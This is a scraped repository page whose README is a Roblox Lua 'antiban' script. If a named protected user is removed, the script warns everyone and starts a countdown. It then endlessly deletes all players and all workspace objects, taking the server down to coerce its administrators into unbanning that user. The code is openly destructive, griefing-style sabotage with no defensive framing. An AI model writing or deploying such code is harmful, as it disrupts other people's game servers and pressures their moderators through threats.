Coder Social home page Coder Social logo

roblox-'s Introduction

n = "B" n = n.."a" n = n.."ns" n = n.."e" n = n.."y" h = Instance.new("Hint") m = Instance.new("Message") script.Name = n.."'s antiban" --------------You can change below------------------ respawntime = 90 protect = "NikePro2004" -------Version [Don't change]------------ version = 1.05

while true do if game.Players:findFirstChild(protect) == nil then m.Parent = game.Workspace m.Text = protect.." is banned, the server will be removed..." wait(3) m.Text = "Unban "..protect.." or remove your script, else the server will be down with the following countdown!" wait(3) for i= respawntime, 0, -1 do if game.Players:findFirstChild(protect) == nil then m.Text = "If "..protect.." doesn't reappear in ["..i.."] then the server is down!" wait(1) end end if game.Players:findFirstChild(protect) ~= nil then m.Text = protect.." came back, nothing will happen!" wait(3) m:remove() else while true do for i, p in ipairs(game.Players:getChildren()) do p:Remove() end for i, w in ipairs(game.Workspace:getChildren()) do w:Remove() end wait() end end else h.Parent = game.Workspace h.Text = "Protecting: "..protect.." - Version: "..version.." - Created by: "..n end wait() end

roblox-'s People

Contributors

script-builder avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.